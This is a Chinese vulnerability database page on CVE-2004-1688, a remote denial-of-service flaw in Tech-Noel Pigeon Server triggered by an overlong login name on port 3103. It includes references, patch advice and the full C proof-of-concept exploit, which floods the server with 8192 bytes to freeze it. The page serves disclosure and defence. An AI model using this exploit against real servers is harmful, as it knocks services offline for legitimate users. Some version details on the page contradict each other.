CVE-2004-1688
CVSS5.0
发布时间 :2004-09-16 00:00:00
修订时间 :2016-10-17 22:59:10
NMCOES    

[原文]Pigeon Server 3.02.0143 and earlier allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a long login name sent to port 3103.


[CNNVD]Tech-Noel Pigeon远程服务拒绝漏洞(CNNVD-200409-042)

        Pigeon服务器3.02.0143及其早期版本存在漏洞。远程攻击者可以借助发往端口3103的超长登录名导致服务拒绝(无限循环和CUP消耗)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1688
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1688
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200409-042
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-September/026515.html
(UNKNOWN)  FULLDISC  20040916 Freeze in Pigeon Server 3.02.0143
http://marc.info/?l=bugtraq&m=109543366631724&w=2
(UNKNOWN)  BUGTRAQ  20040916 Freeze in Pigeon Server 3.02.0143
http://www.securityfocus.com/bid/11203
(VENDOR_ADVISORY)  BID  11203
http://xforce.iss.net/xforce/xfdb/17427
(VENDOR_ADVISORY)  XF  pigeon-server-dos(17427)

- 漏洞信息

Tech-Noel Pigeon远程服务拒绝漏洞
中危 其他
2004-09-16 00:00:00 2005-10-20 00:00:00
远程  
        Pigeon服务器3.02.0143及其早期版本存在漏洞。远程攻击者可以借助发往端口3103的超长登录名导致服务拒绝(无限循环和CUP消耗)。

- 公告与补丁

        The vendor has released an upgrade dealing with this issue.
        Tech-Noel Pigeon Server 3.2.143
        

- 漏洞信息 (468)

Pigeon Server <= 3.02.0143 Denial of Service Exploit (EDBID:468)
windows dos
2004-09-19 Verified
0 Luigi Auriemma
N/A [点击下载]
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#endif

#define VER "0.1"
#define PORT 3103
#define BUFFSZ 8192 // we need at least 8180 'a's

u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd;
u_short port = PORT;
u_char *buff;

setbuf(stdout, NULL);

fputs("\n"
"Pigeon server <= 3.02.0143 freeze "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 2) {
printf("\nUsage: %s <server> [port(%d)]\n"
"\n", argv[0], PORT);
exit(1);
}

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

if(argc > 2) port = atoi(argv[2]);

peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("\n- target %s:%hu\n",
inet_ntoa(peer.sin_addr), port);

sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();

if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();

buff = malloc(BUFFSZ);
if(!buff) std_err();
memset(buff, 'a', BUFFSZ);
buff[BUFFSZ - 5] = '|';
buff[BUFFSZ - 4] = '|';
buff[BUFFSZ - 3] = '1';
buff[BUFFSZ - 2] = '|';
buff[BUFFSZ - 1] = '|';

fputs("- send malformed data\n", stdout);
if(send(sd, buff, BUFFSZ, 0)
< 0) std_err();

close(sd);
fputs("- the server should be freezed, check it manually\n\n", stdout);
return(0);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}

#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif

// milw0rm.com [2004-09-19]		

- 漏洞信息

10008
Pigeon Server Login Field Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

Pigeon Server contains a flaw that may allow a remote denial of service. The issue is triggered when a login field longer than 8180 chars is sent, and will result in loss of availability for the service.

- 时间线

2004-09-16 2004-09-16
2004-09-16 Unknow

- 解决方案

Upgrade to version 3.03.146 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Tech-Noel Pigeon Server Remote Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 11203
Yes No
2004-09-16 12:00:00 2009-07-12 07:06:00
Discovery of this issue is credited to Luigi Auriemma <aluigi@autistici.org>.

- 受影响的程序版本

Tech-Noel Pigeon Server 3.2.143
Tech-Noel Pigeon Server 3.3.146

- 不受影响的程序版本

Tech-Noel Pigeon Server 3.3.146

- 漏洞讨论

Reportedly the Tech-Noel Pigeon Server is affected by a remote denial of service vulnerability. This issue is due to a failure of the application to handle exceptional user input.

An attacker may exploit this issue to cause the affected server to hang, effectively denying service to legitimate users.

- 漏洞利用

No exploit is required to leverage this issue.

- 解决方案

The vendor has released an upgrade dealing with this issue.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站